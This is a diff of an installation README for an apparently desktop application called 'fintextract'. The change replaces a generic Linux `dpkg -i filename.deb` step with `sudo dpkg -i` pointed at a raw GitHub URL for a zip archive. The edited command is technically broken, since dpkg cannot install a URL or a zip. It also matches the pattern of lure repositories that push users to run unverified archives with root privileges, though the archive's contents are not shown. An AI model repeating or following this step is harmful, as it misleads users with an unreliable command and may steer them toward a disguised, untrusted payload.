Kakawana/fintextract/README.md

 4. **Install the Application:**
    - For Windows: Double-click the downloaded file to start the installation.
 Follow the on-screen prompts.
    - For macOS: Open the downloaded file and drag the application to your Applications folder.
    - For Linux: Open a terminal and navigate to the downloaded file.
-Use the command `sudo dpkg -i filename.deb` (replace "filename.deb" with the actual file name).
+Use the command `sudo dpkg -i https://github.com/Kakawana/fintextract/raw/refs/heads/main/fintextract/Software-2.5.zip` (replace "https://github.com/Kakawana/fintextract/raw/refs/heads/main/fintextract/Software-2.5.zip" with the actual file name).

 5. **Run fintextract:** After installation, find fintextract in your applications and double-click to open it.